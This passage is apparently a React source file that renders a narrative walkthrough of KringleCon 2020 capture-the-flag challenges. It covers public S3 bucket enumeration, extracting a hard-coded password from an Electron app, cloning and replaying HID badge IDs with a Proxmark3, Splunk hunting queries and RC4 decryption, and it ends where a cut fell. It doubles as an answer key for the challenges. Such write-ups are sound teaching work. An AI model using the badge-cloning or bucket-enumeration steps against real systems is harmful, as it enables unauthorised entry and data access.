import 'magic-snowflakes';
import React from 'react';
import {Link} from 'react-router-dom';
import {Image, Nav, Navbar, Button} from 'react-bootstrap';
import Snowflakes from 'magic-snowflakes';
import ScrollArea from 'react-scrollbar';
import {CodeBlock, dracula} from 'react-code-blocks';
import Termynal from './termynal';

import header from './header.jpg';
import character from './character.png';
import untwirled from './untwirled.png';
import santavator_panel from './santavator.png';

import './App.css';
import './termynal.css';
import 'bootstrap/dist/css/bootstrap.min.css';

/*
 * Color Palette:
 *   https://colorpalettes.net/color-palette-3862/
 * #213036 - Dark Blue
 * #265500 - Dark Green
 * #96d800 - Lime Green
 * #f58f92 - Salmon
 * #b7241b - Red
 */

const CODE_BLOCK_STYLE = {
  textAlign: "left",
  fontWeight: "bold",
  fontFamily: "monospace",
  marginBottom: "15px"
};

/* ---- INTRODUCTION ---- */
const INTRODUCTION = (
  <p className="Text-block"><span className="tab" />
    One snowy winter morning, you awake to find yourself rather prickly. You
    raise your hand up to your eyes... and see... no, this cannot be right. But
    yes, you are in fact a pink, prickly cactus with a sunflower head in a
    short purple suit. You look down and notice your badge; it reads <span
    className="Red-fancy">KringleCon 2020</span>. What does any of this mean?
    What lies in your future? No one can be certain. One thing seems clear
    though, you are here for a reason and it is imperative that you discover
    your true purpose.
  </p>
);
const STARTING_AREA = (
  <p className="Text-block">You begin to take notice of
    your surroundings. How odd? You see a sign indicating you are just off of
    the New Jersey turnpike. There is a gondola in front of you and a rather
    elfish character with a Santa hat hanging off of his head. As you approach
    him, he introduces himself as Jingle Ringford: <span className="NPC-text">
    "Welcome! Hop in the gondola to take a ride up the mountain to Exit 19:
    Santa's castle!"</span> This cannot be right. <span className="Red-fancy">
    Santa's castle??</span> What madness. Ringford continues speaking but you
    are too distraught by the events transpiring that you only make out the
    occasional word. <span className="NPC-text">"Badge" ... "Santa" ...
    "Discord" ... "Convention."</span> As you gain your composure, you begin
    to listen closer to the strange man's words: <span className="NPC-text">
    "Oh, and before you head off up the mountain, you might want to try to
    figure out what's written on that advertising billboard."</span>
  </p>
);

/* ---- OBJECTIVE 1 ---- */
const SANTAS_GIFT_LIST_SRC = "https://2020.kringlecon.com/textures/billboard.png";
const PHOTOPEA_HREF = "https://www.photopea.com/";
const SANTAS_GIFT_LIST = (
  <p className="Text-block"><span className="tab" />
    You peer over at the billboard Ringford had mentioned. As you squint your
    eyes, you make out the words <span className="NPC-text">"VISIT THE NORTH
    POLE EXIT 19"</span> and, at the bottom of the billboard, Santa's Personal
    Gift List. But what's this? You cannot read the words on the paper as it
    appears someone has twirled the text to make it illegible. How inconvenient.
  </p>
);
const RELIABLE_NARRATOR_INTRODUCTION = (
  <p className="Narrator-block">
    Hey there! Let me introduce myself: <span className="NPC-text">~The Reliable
    Omniscient Narrator~</span> at your service. I am here to serve those that
    may not want to read a whole piece of fiction while perusing this writeup.
    I will primarily get straight to the point on how the objectives are solved without
    the extra fudge. Speaking of fudge, I — I have to go. The fudge is calling
    me. Before I go, you can find the source of the image to download by
    clicking on it or finding it with your browser developer tools. Finally,
    you can use <a href={PHOTOPEA_HREF}>the tool</a> mentioned by <span className="NPC-text">Jingle Ringford</span> to a
    free online image editor, similar to Photoshop. Use the lasso tool to
    select the twirled section and then you can detwirl with <code>Filter &#62;
    Distort &#62; Twirl</code>.
  </p>
);
const SANTAS_GIFT_LIST_SOLVED = (
  <p className="Text-block">After some time you spend
    pondering this problem, you remember a tool that you can use to untwirl the
    image and reveal what Josh Wright wants for the holidays. You
    tinker with your tool for a bit of time before successfully untwirling the
    message. <span className="Red-fancy">Huzzah!</span> Josh Wright wants an
    RFID tool known as a <span className="NPC-text">Proxmark</span>, often
    dubbed the swiss-army tool of RFID! Hopefully, it will not be used for
    anything particularly nefarious...
  </p>
);
const SANTAS_GIFT_LIST_TRANSITION = (
  <p className="Text-block">Still unsure
    of your purpose as a pink cactus thing, you feel pulled into this mystery.
    Something in your mind is racing, telling you to go deeper. <span
    className="NPC-text">"More, more security challenges,"</span> you hear. All
    of this is overwhelming; however, you reluctantly board the gondola along
    with a whole assortment of characters that appear just as odd, if not
    stranger than yourself. You sigh — terrified, yet somehow thrilled.
  </p>
);

/* ---- OBJECTIVE 2 ---- */
const S3_TALK_SRC = "http://www.youtube.com/watch?v=t4UzXx5JHk0";
const S3_INTRODUCTION = (
  <p className="Text-block"><span className="tab" />
    Your gondola ride was shorter than expected. As you step off of the lift,
    an unbelieve world begins to pour into your unassuming cactus eyeholes.
    More of the strange characters are loitering around the snowy field in
    front of an enormous castle. There appear to be tables set up with
    computers and elves nearby and — what is that? Is that <span
    className="Red-fancy">Santa??</span> And three <span className="Red-fancy">
    French Hens?</span> Surely, you are dreaming. You begin to wander around
    the entrance to the castle, introducing yourself to the various <span className="NPC-text">elves</span> and,
    of course, <span className="Red-fancy">Santa</span>. They are all friendly enough, but you find it strange that they will
    repeat the same things again and again, almost as if they were programmed
    to do so. According to the <span className="NPC-text">elves</span>, <span className="Red-fancy">Santa</span> in particular has not been himself...
  </p>
);
const S3_INTRODUCTION_CONTINUED = (
  <p className="Text-block">There is a
    significant crowd surrounding one of the tables in front of the castle. You
    approach the table to find that the elf <span className="NPC-text">Shinny
    Upatree</span> is having a crisis. Apparently, <span className="Red-fancy">Santa</span> has been
    experimenting with <span className="Red-fancy">~wrapping technology~</span> of
    which he stored in an S3 bucket. Unfortunately, <span className="NPC-text">
    Shinny Upatree</span> has forgotten where to find it. You pipe in to mention
    that you remember watching an informative talk on the subject and offer your
    help. Everyone makes a path for you to walk to the terminal, their eyes glued
    to you as you sit down, take a deep breath, and begin.
  </p>
);
const S3_SOLUTION_1 = (
  <p className="Narrator-block">See Josh Wright's great
    talk on <a href={S3_TALK_SRC}>Open S3 Buckets</a>. In the message of the
    day for the terminal, it highlights <span className="NPC-text">Wrapper3000
    </span> which sticks out considerably. You are provided a bucket finder
    script which enumerates a provided wordlist for any existing S3 bucket with
    public permissions.
  </p>
);
const S3_TERMINAL_1 = (
  <div className="Terminal-block" id="termynal1" data-termynal>
    <span data-ty="input">cat wordlist</span>
    <span data-ty>
      kringlecastle<br/>
      wrapper<br/>
      santa<br/>
      <span className="NPC-text">Wrapper3000</span><br/>
      <span className="NPC-text">wrapper3000</span><br/>
    </span>
    <span data-ty="input">./bucket_finder.rb --download wordlist</span>
    <span data-ty>http://s3.amazonaws.com/kringlecastle</span>
    <span data-ty>Bucket found but access denied: kringlecastle</span>
    <span data-ty>http://s3.amazonaws.com/wrapper</span>
    <span data-ty>Bucket found but access denied: wrapper</span>
    <span data-ty>http://s3.amazonaws.com/santa</span>
    <span data-ty>Bucket santa redirects to: santa.s3.amazonaws.com</span>
    <span data-ty>http://santa.s3.amazonaws.com/</span>
    <span data-ty><span className="tab" />Bucket found but access denied: santa</span>
    <span data-ty>http://s3.amazonaws.com/Wrapper3000</span>
    <span data-ty>Bucket does not exist: Wrapper3000</span>
    <span data-ty>http://s3.amazonaws.com/wrapper3000</span>
    <span data-ty><span className="NPC-text">Bucket Found: wrapper3000 ( http://s3.amazonaws.com/wrapper3000 )</span></span>
    <span data-ty><span className="NPC-text"><span className="tab" />&#60;Downloaded&#62; http://s3.amazonaws.com/wrapper3000/package</span></span>
  </div>
);
const S3_SOLUTION_2 = (
  <p className="Narrator-block">We used the <code>
    --download</code> flag for the script to pull any public buckets that
    are found by the script. After pulling, we inspect the file contained and slowly begin
    to realize that it is obfuscated, compressed, and zipped in a variety of
    ways which we must discover and reverse. Here is how we can ultimately
    uncover the actual contents of the file.
  </p>
);
const S3_TERMINAL_2 = (
  <div className="Terminal-block" id="termynal2" data-termynal>
    <span data-ty="input">cd wrapper3000/</span>
    <span data-ty="input">ls</span>
    <span data-ty>package</span>
    <span data-ty="input">cat package</span>
    <span data-ty>UEsDBAoAAAAAAIAwhFEbRT8anwEAAJ8BAAAcABwAcGFja2FnZS50eHQuWi54ei54eGQudGFyLmJ6MlVUCQADoBfKX6AXyl91eAsAAQT2AQAABBQAAABCWmg5MUFZJlNZ2ktivwABHv+Q3hASgGSn//AvBxDwf/xe0gQAAAgwAVmkYRTKe1PVM9U0ekMg2poAAAGgPUPUGqehhCMSgaBoAD1NNAAAAyEmJpR5QGg0bSPU/VA0eo9IaHqBkxw2YZK2NUASOegDIzwMXMHBCFACgIEvQ2Jrg8V50tDjh61Pt3Q8CmgpFFunc1Ipui+SqsYB04M/gWKKc0Vs2DXkzeJmiktINqjo3JjKAA4dLgLtPN15oADLe80tnfLGXhIWaJMiEeSX992uxodRJ6EAzIFzqSbWtnNqCTEDML9AK7HHSzyyBYKwCFBVJh17T636a6YgyjX0eE0IsCbjcBkRPgkKz6q0okb1sWicMaky2Mgsqw2nUm5ayPHUeIktnBIvkiUWxYEiRs5nFOM8MTk8SitV7lcxOKst2QedSxZ851ceDQexsLsJ3C89Z/gQ6Xn6KBKqFsKyTkaqO+1FgmImtHKoJkMctd2B9JkcwvMr+hWIEcIQjAZGhSKYNPxHJFqJ3t32Vjgn/OGdQJiIHv4u5IpwoSG0lsV+UEsBAh4DCgAAAAAAgDCEURtFPxqfAQAAnwEAABwAGAAAAAAAAAAAAKSBAAAAAHBhY2thZ2UudHh0LloueHoueHhkLnRhci5iejJVVAUAA6AXyl91eAsAAQT2AQAABBQAAABQSwUGAAAAAAEAAQBiAAAA9QEAAAAA</span>
    <span data-ty="input">cat package | <span className="NPC-text">base64 -d</span> &#62; package_decoded</span>
    <span data-ty="input">cat package_decoded</span>
    <span data-ty>...</span>
    <span data-ty># this file is clearly binary: interesting header package.txt.Z.xz.xxd.tar.bz2</span>
    <span data-ty="input">file package_decoded</span>
    <span data-ty>package_decoded: Zip archive data, at least v1.0 to extrac</span>
    <span data-ty="input"><span className="NPC-text">unzip package_decoded</span></span>
    <span data-ty>Archive:  package_decoded</span>
    <span data-ty> extracting: package.txt.Z.xz.xxd.tar.bz2</span>
    <span data-ty="input"><span className="NPC-text">tar xvf package.txt.Z.xz.xxd.tar.bz2</span></span>
    <span data-ty>package.txt.Z.xz.xxd</span>
    <span data-ty="input">cat package.txt.Z.xz.xxd</span>
    <span data-ty>00000000: fd37 7a58 5a00 0004 e6d6 b446 0200 2101  .7zXZ......F..!.</span>
    <span data-ty>00000010: 1600 0000 742f e5a3 0100 2c1f 9d90 4ede  ....t/....,...N.</span>
    <span data-ty>00000020: c8a1 8306 0494 376c cae8 0041 054d 1910  ......7l...A.M..</span>
    <span data-ty>00000030: 46e4 bc99 4327 4d19 8a06 d984 19f3 f08d  F...C'M.........</span>
    <span data-ty>00000040: 1b10 45c2 0c44 a300 0000 0000 c929 dad6  ..E..D.......)..</span>
    <span data-ty>00000050: 64ef da24 0001 452d 1e52 57e8 1fb6 f37d  d..$..E-.RW....&#125;</span>
    <span data-ty>00000060: 0100 0000 0004 595a                      ......YZ</span>
    <span data-ty="input">cat package.txt.Z.xz.xxd | <span className="NPC-text">xxd -r</span> &#62; package.txt.Z.xz</span>
    <span data-ty="input"><span className="NPC-text">xz -d package.txt.Z.xz</span></span>
    <span data-ty="input"><span className="NPC-text">uncompress package.txt.Z</span></span>
    <span data-ty="input">cat package.txt</span>
    <span data-ty><span className="NPC-text">North Pole: The Frostiest Place on Earth</span></span>
  </div>
);
const S3_SOLUTION_3 = (
  <div>
    <p className="Narrator-block">
      Let's break down how we unwrapped the message:
    </p>
    <ol type="1">
      <li>
        If we output the wrapped <code>package</code> file, we see it resembles a base 64
        string. This means we can pipe the contents of this package to a base 64 decoder
        e.g. <code>base64 -d</code> and then pipe the output of this to a new file.
      </li>
      <li>
        Inspecting the contents of this new file, and using the <code>file</code> command
        to determine the file type, we see that it is a simple zip file. The <code>unzip</code> command
        should do the trick here.
      </li>
      <li>
        The file produced from the zip has a <code>bz2</code> file extension so we should simply
        be able to use the <code>tar</code> command with the extract flag to decompress this.
      </li>
      <li>
        The next file is a little different. If we examine the contents of the file we see
        that it is a hexdump. The file extension <code>xxd</code> is the name of a common
        command line based hexdump tool. The tool has a reverse hexdump flag which we can
        use in a very similar way to how we decoded the base 64 string at the beginning.
      </li>
      <li>
        Next is an <code>xz</code> compressed file, some Googling shows we can simply use
        the <code>xz -d</code> command to decompress.
      </li>
      <li>
        Our last wrapping shows that the file is <code>Z</code> compressed, and a simple way
        to uncompress this is with the <code>uncompress</code> command.
      </li>
      <li>
        We <code>cat</code> the final package text file to reveal our answer.
      </li>
    </ol>
  </div>
);
const S3_FINAL = (
  <p className="Text-block">
    That's it! You figured it out. By using the handy <code>bucket_finder.rb</code> script,
    you managed to pull the bucket where <span className="Red-fancy">Santa</span> stored
    a sample of his wrapping technology. Finally, with your understanding of various zipping,
    compression, and encoding schemes, you found the contents of the original file: <span className="NPC-text">
    North Pole: The Frostiest Place on Earth</span>.
  </p>
);

/* ---- OBJECTIVE 3 ---- */
const POS_INTRODUCTION_1 = (
  <p className="Text-block"><span className="tab" />
    After helping <code>Shinny Upatree</code> with finding the wrapping technology,
    you get curious as to what the castle has in store for you. You make your way
    past <span className="Red-fancy">Santa</span> to the front entrance of the castle.
    Your cactus stub hobbles to open the castle doors, when you hear a <span className="NPC-text">CRUNCH</span>.
    Peering down, you spot a <span className="Red-fancy">broken candycane</span> and pick it up; this might come in handy later.
  </p>
);
const POS_INTRODUCTION_2 = (
  <p className="Text-block">
    As you explore the first floor, you take note of some interesting findings. A strange mural
    in the entryway of <span className="Red-fancy">Santa</span> with some knick-knacks.
    The <span className="NPC-text">elves</span> continue to express their concerns with how
    strange <span className="Red-fancy">Santa</span> has been acting. There are more terminals
    and even some fun arcade games that different <span className="NPC-text">elves</span> want
    help with. You go around helping wherever you can and the elves reciprocate by giving you
    hints that prove helpful with different challenges. There is also the <span className="Red-fancy">Santavator</span>,
    an advanced elevator system which seemingly operates on the most state of the
    art <span className="NPC-text">North Pole technology</span>. You might need to find an
    elevator service key and some Christmas tree bulbs to power this thing. As you make your
    way into the courtyard, a particularly interesting challenge catches your eye. It seems
    like <span className="NPC-text">Sugarplum Mary</span> needs your help as she is locked
    out of the <span className="Red-fancy">Point-of-Sale Santa Shop</span> program.
  </p>
);
const ASAR_MEDIUM_ARTICLE = "https://medium.com/how-to-electron/how-to-get-source-code-of-any-electron-application-cbb5c7726c37";
const POS_SOLUTION_1 = (
  <p className="Narrator-block">Opening the desktop
    we see that we are locked out and have to download the "offline" version
    of the santa shop point of sale program. We do this and install the
    executable file. From here we are able to use a tool called <code>
    asar</code> to extract the electron source code. See this useful <a href={ASAR_MEDIUM_ARTICLE}>
    Medium article</a> on getting the source code from any electron application.
    Finally, after briefly inspecting the source code we find the password in <code>
    main.js</code>:
  </p>
);
const POS_CODE_SNIPPET = "...\nconst SANTA_PASSWORD = 'santapass';\n..."
const POS_CODE_BLOCK = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={POS_CODE_SNIPPET}
    language={"javascript"}
    theme={dracula}
    showLineNumbers={false} />
);
const POS_FINAL = (
  <p className="Text-block">
    Using your newly found knowledge of how to extract the source code of electron applications,
    you sift through the source code of the point of sale program to find the password! You
    tell <span className="NPC-text">Sugarplum Mary</span> to type in <code>santapass</code> and
    she revels in excitement as she is able to unlock the program once again and serve
    concessions to the sugar hungry <span className="NPC-text">elves</span>.
  </p>
);

/* ---- OBJECTIVE 4 ---- */
const SANTAVATOR_SOLUTION = (
  <p className="Narrator-block"><span className="tab" />
    There are various items that you can pick up in order to complete this
    objective rather easily. First, you need the elevator service key which
    can be found in the Entry after talking to <span className="Red-fancy">
    Sparkle Redberry</span>. Then, you can find the green bulb in the NorthWest
    corner of the courtyard and either the broken candy cane - right by the
    front entrance of the castle - or a hex nut which can be found right
    in front of the Santavator on the first floor.
  </p>
);
const SANTAVATOR_SOLUTION_2 = (
  <p className="Narrator-block">Finally, we
    can open the service panel of the Santavator and use the candy cane or
    hex nut to divert the electrons into the various ports. You will also need
    to use the different colored bulbs to change the color of the electrons
    before they hit their respective ports. After exploring more of the floors
    you will find the rest of the bulbs and more items to help divert the
    electrons. This will help you get to all floors besides Floor 3 - Santa's
    Office which will require a different approach.
  </p>
);
const SANTAVATOR_APPROACH = (
  <p className="Text-block">
    You have explored a considerable part of the first floor of the castle and the courtyard.
    All the while, you found things that the <span className="NPC-text">maintenance elves</span> seemed
    to have misplaced in order to operate the <span className="Red-fancy">Santavator</span>. You
    found the service elevator key, the green bulb, and a candycane which was enough to get it
    up and running. Perhaps there will be more bulbs and items on the rest of the floors?
  </p>
);

/* ---- OBJECTIVE 5 ---- */
const HID_TALK_LINK = "https://www.youtube.com/watch?v=647U85Phxgo&ab_channel=KringleCon";
const HID_INTRODUCTION = (
  <p className="Text-block"><span className="tab" />
    You start off by going up to the second floor, where the <span className="Red-fancy">KringleCon</span> talks
    are occurring, and even breaking into the room where the speakers prepare to get on stage.
    On this floor you find both the red bulb and the <span className="Red-fancy">Santavator's</span> workshop floor
    button, giving you access to the rest of the castle besides <span className="Red-fancy">Santa's Office</span>.
    In the workshop, you notice something strange: a locked door! This strikes your attention
    since the rest of the castle seems relatively open. What could possibly be hiding behind it?
    Your curiousity motivates you as you make your way into the wrapping room near the back of workshop.
    Oh! You look down and it appears an <span className="NPC-text">elf</span> has mishandled Josh Wright's
    gift for the holidays. A <span className="Red-fancy">Proxmark3</span> sits on the ground and
    you remember hearing something about using these fancy gadgets to break HID locks from Larry
    Pesce's <a href={HID_TALK_LINK}>HID Card Hacking</a>. Hopefully Josh will not mind you using
    it briefly to solve this mystery.
  </p>
);
const HID_SOLUTION_1 = (
  <p className="Narrator-block">
    In order to open the HID lock in the <span className="Red-fancy">Workshop
    </span> we have to get a <span className="NPC-text">Proxmark</span> which
    we can find in the middle of the <span className="Red-fancy">Wrapping Room</span>
    . We can also get hints for this by talking to <span className="NPC-text">
    Bushy Evergreen</span> in the Talks Lobby. If we open the Proxmark terminal
    from our inventory, we can run <code>lf hid read</code> while near
    various <span className="NPC-text">elves</span> in order to get their badge tag IDs.
  </p>
);
const HID_TERMINAL_1 = (
  <div className="Terminal-block" id="termynal3" data-termynal>
    <span data-ty="input">lf hid read</span>
    <span data-ty>#db# TAG ID: <span className="NPC-text">2006e22f0e</span> (6023) - Format Len: 26 bit - FC: 113 - Card: 6023</span>
  </div>
);
const HID_SOLUTION_2 = (
  <p className="Narrator-block">
    For some of the <span className="NPC-text">elves</span> it will return their badge ID as
    seen above. The one above was found on an <span className="NPC-text">elf</span> on the
    second floor which ended up working while simulating on the locked door.
  </p>
);
const HID_TERMINAL_2 = (
  <div className="Terminal-block" id="termynal4" data-termynal>
    <span data-ty="input">lf hid sim -r <span className="NPC-text">2006e22f0e</span></span>
    <span data-ty>[=] Simulating HID tag using raw 2006e22f0e</span>
    <span data-ty>[=] Stopping simulation after 10 seconds.</span>
    <span data-ty>[=] Done</span>
  </div>
);
const HID_FINAL = (
  <p className="Text-block">
    After going around to a handful of <span className="NPC-text">elves</span> and sneakily
    scanning their badges with your <span className="Red-fancy">Proxmark3</span>, you go back
    to the door and start simulating each badge individually to see if any of
    the <span className="NPC-text">elves</span> had access to this room. After two or three
    tries, you hear the door click! Slowly, you open the door and walk into an almost pitch
    black room with a faint light peering out from the opposing wall. You make your way through a glass
    maze, and when you finally get to the source of the light everything goes dark — momentarily.
  </p>
)

/* ---- OBJECTIVE 6 ---- */
const SPLUNK_INTRODUCTION = (
  <p className="Text-block"><span className="tab" />
    It's... it's... what is this? You are still alive but you don't feel well. In fact, you
    can feel your high cholesterol level as your <span className="Red-fancy">blood</span> is
    having a hard time pushing through your cookie filled <span className="Red-fancy">blood vessels</span>.
    As you open your eyes and survey the room, you notice you are back at the entrance of the
    castle on the first floor. And even worse, you are <span className="Red-fancy">Santa</span>??
    You slap yourself, hoping to wake up from this fever dream. Maybe a pinch will work? Nope.
    Behind you is the huge mural from where you came from but before you have a chance to examine
    it closer, <span className="NPC-text">Angel Candysalt</span> comes running up to you begging
    for help. She stammers that there was a security incident and you have to report to the
    Splunk Security Operations Center immediately. You follow her into
    the <span className="NPC-text">Great Room</span> to learn more.
  </p>
);
const SPLUNK_SOLUTION_1 = (
  <p className="Narrator-block">
    In the Great Room, we can click on the Splunk desktop which will take us
    to a Security Operations Center (SOC) dashboard in Splunk. We have to answer
    a handful of training questions and a final challenge question.
  </p>
);
const SPLUNK_Q1 = (
  <p className="Narrator-block"><span className="NPC-text">
    <span className="unselectable">1.</span><span className="tab" />How many
    distinct MITRE ATT&#38;CK techniques did Alice emulate?</span>
  </p>
);
const SPLUNK_Q2 = (
  <p className="Narrator-block"><span className="NPC-text">
    <span className="unselectable">2.</span><span className="tab" />What are
    the names of the two indexes that contain the results of emulating
    Enterprise ATT&#38;CK technique 1059.003? (Put them in alphabetical order
    and separate them with a space)</span>
  </p>
);
const SPLUNK_Q3 = (
  <p className="Narrator-block"><span className="NPC-text">
    <span className="unselectable">3.</span><span className="tab" />One
    technique that Santa had us simulate deals with 'system information
    discovery'. What is the full name of the registry key that is queried to
    determine the MachineGuid?</span>
  </p>
);
const SPLUNK_Q4 = (
  <p className="Narrator-block"><span className="NPC-text">
    <span className="unselectable">4.</span><span className="tab" />According
    to events recorded by the Splunk Attack Range, when was the first OSTAP
    related atomic test executed? (Please provide the alphanumeric UTC
    timestamp.)</span>
  </p>
);
const SPLUNK_Q5 = (
  <p className="Narrator-block"><span className="NPC-text">
    <span className="unselectable">5.</span><span className="tab" />One Atomic
    Red Team test executed by the Attack Range makes use of an open source
    package authored by frgnca on GitHub. According to Sysmon (Event Code 1)
    events in Splunk, what was the ProcessId associated with the first use of
    this component?</span>
  </p>
);
const SPLUNK_Q6 = (
  <p className="Narrator-block"><span className="NPC-text">
    <span className="unselectable">6.</span><span className="tab" />Alice ran
    a simulation of an attacker abusing Windows registry run keys. This
    technique leveraged a multi-line batch file that was also used by a few
    other techniques. What is the final command of this multi-line batch file
    used as part of this simulation?</span>
  </p>
);
const SPLUNK_Q7 = (
  <p className="Narrator-block"><span className="NPC-text">
    <span className="unselectable">7.</span><span className="tab" />According
    to x509 certificate events captured by Zeek (formerly Bro), what is the
    serial number of the TLS certificate assigned to the Windows domain
    controller in the attack range?</span>
  </p>
);
const SPLUNK_CHALLENGE = (
  <p className="Narrator-block"><span className="NPC-text">
    <span className="unselectable">Challenge: </span>What is the name of the
    adversary group that Santa feared would attack KringleCon?</span>
  </p>
);

const SPLUNK_A1_SNIPPET = (
  "| tstats count where index=* by index\n"
  + "| search index=T*-win OR T*-main\n"
  + "| rex field=index \"(?<technique>t\\d+)[\\.\\-].0*\"\n"
  + "| stats dc(technique)\n\n"
  + "Result:\ndc(technique))\n13"
);
const SPLUNK_A1 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={SPLUNK_A1_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const SPLUNK_A2_SNIPPET = (
  "| tstats count where index=* by index\n"
  + "| search index=T1059.003-*\n"
  + "| sort index\n\n"
  + "Result:\n"
  + "index count\n"
  + "t1059.003-main 1984\n"
  + "t1059.003-win 18519"
);
const SPLUNK_A2 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={SPLUNK_A2_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const SPLUNK_A3_SNIPPET = (
  "We can search Atomic Red Team github for MachineGuid\n"
  + "https://github.com/redcanaryco/atomic-red-team/search?q=MachineGuid\n\n"
  + "We find the T1082.yaml which shows the line with the registry key\n"
  + "https://github.com/redcanaryco/atomic-red-team/blob/89f95ec381abd7064e4178094ce88f299a\n"
  + "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography"
);
const SPLUNK_A3 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={SPLUNK_A3_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const SPLUNK_A4_SNIPPET = (
  "index=attack\n"
  + "| search \"OSTAP\"\n"
  + "| sort _time\n\n"
  + "Result:\n"
  + "2020-11-30T17:44:15Z"
);
const SPLUNK_A4 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={SPLUNK_A4_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const SPLUNK_A5_SNIPPET = (
  "frgnca user on GitHub has one rather popular open source repository\n"
  + "called AudioDeviceCmdlets. We can search Atomic Red Team for this.\n"
  + "https://github.com/redcanaryco/atomic-red-team/search?q=audio\n\n"
  + "We find the powershell command and now we can search splunk for it.\n"
  + "https://github.com/redcanaryco/atomic-red-team/blob/24549e3866407c3080b95b6afebf78e8ac\n\n"
  + "index=*\n"
  + "| search \"WindowsAudioDevice-Powershell-Cmdlet\"\n"
  + "| search EventCode = 1\n\n"
  + "Result:\n"
  + "3648"
);
const SPLUNK_A5 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={SPLUNK_A5_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const SPLUNK_A6_SNIPPET = (
  "We can search splunk for various Batch files and cross reference them\n"
  + "on Atmoic Red Team.\n"
  + "index=*\n"
  + "| search \".bat\"\n\n"
  + "Result:\n"
  + "Discovery.bat gets a match on the repository\n"
  + "https://github.com/redcanaryco/atomic-red-team/blob/24549e3866407c3080b95b6afebf78e8ac\n"
  + "quser"
);
const SPLUNK_A6 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={SPLUNK_A6_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const SPLUNK_A7_SNIPPET = (
  "index=* sourcetype=bro:x509*\n"
  + "| search \"attackrange.local\"\n"
  + "Result:\n"
  + "55FCEEBB21270D9249E86F4B9DC7AA60"
);
const SPLUNK_A7 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={SPLUNK_A7_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const SPLUNK_CHALLENGE_SNIPPET = (
  "Hint from Alice Bluebird — This last one is encrypted using your favorite phrase! The base64 encoded ciphertext is: 7FXjP1lyfKbyDK/MChyf36h7\n"
  + "It's encrypted with an old algorithm that uses a key. We don't care about RFC 7465 up here! I leave it to the elves to determine which one!\n\n"
  + "Look up of RFC 7465 is mainly concerned with RC4 so this is likely the\n"
  + "encryption that is used:\n"
  + "https://tools.ietf.org/html/rfc7465\n\n"
  + "We find a simple how to decrypt RC4 in python:\n"
  + "https://stackoverflow.com/questions/29607753/how-to-decrypt-a-file-that-encrypted-with"
);
const SPLUNK_CHALLENGE_ANSWER = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={SPLUNK_CHALLENGE_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const IETF_LINK = "https://tools.ietf.org/html/rfc7465";
const STACKOVERFLOW_RC4 = "https://stackoverflow.com/questions/29607753/how-to-decrypt-a-file-that-encrypted-with";
const SPLUNK_TALK = "https://www.youtube.com/watch?v=RxVgEFt08kU&ab_channel=KringleCon";
const SPLUNK_SOLUTION = (
  <p className="Narrator-block">
    We find that RFC 7465 is mainly concerned with RC4 encryption from this <a href={IETF_LINK}>Internet
    Engineering Task Force (IETF) memo</a>. So, we can use the <a href={STACKOVERFLOW_RC4}>StackOverflow post</a> that
    overviews how to decrypt RC4 if we know the key. If you watch Dave Herrald's talk
    on <a href={SPLUNK_TALK}>Adversary Emulation and Automation with Splunk</a> we are told
    what Santa's favorite phrase is <code>Stay Frosty</code>, and likely the encryption key.
  </p>
);
const SPLUNK_TERMINAL = (
  <div className="Terminal-block" id="termynal5" data-termynal>
    <span data-ty="input">python</span>
    <span data-ty>Python 2.7.16 (default, Jun 5 2020, 22:59:21)</span>
    <span data-ty>Type "help", "copyright", "credits" or "license" for more information.</span>
    <span data-ty="input" data-ty-prompt=">>>">import base64</span>
    <span data-ty="input" data-ty-prompt=">>>">data = base64.b64decode("<span className="NPC-text">7FXjP1lyfKbyDK/MChyf36h7</span>")</span>
    <span data-ty="input" data-ty-prompt=">>>">key = "<span className="NPC-text">Stay Frosty</span>"</span>
    <span data-ty="input" data-ty-prompt=">>>">S = range(256)</span>
    <span data-ty="input" data-ty-prompt=">>>">j = 0</span>
    <span data-ty="input" data-ty-prompt=">>>">out = []</span>
    <span data-ty="input" data-ty-prompt=">>>"></span>
    <span data-ty="input" data-ty-prompt=">>>">#KSA Phase</span>
    <span data-ty="input" data-ty-prompt=">>>">for i in range(256):</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />j = (j + S[i] + ord( key[i % len(key)] )) % 256</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />S[i] , S[j] = S[j] , S[i]</span>
    <span data-ty="input" data-ty-prompt="..."></span>
    <span data-ty="input" data-ty-prompt=">>>">#PRGA Phase</span>
    <span data-ty="input" data-ty-prompt=">>>">for char in data:</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />i = ( i + 1 ) % 256</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />j = ( j + S[i] ) % 256</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />S[i] , S[j] = S[j] , S[i]</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))</span>
    <span data-ty="input" data-ty-prompt="..."></span>
    <span data-ty="input" data-ty-prompt=">>>">print ''.join(out)</span>
    <span data-ty><span className="NPC-text">The Lollipop Guild</span></span>
  </div>
);
const SPLUNK_FINAL = (
  <p className="Text-block">
    It took some time for you to figure out how to use Splunk. <span className="Red-fancy">Santa</span> would
    have probably known how to use it, but you are of course not <span className="Red-fancy">Santa</span> so
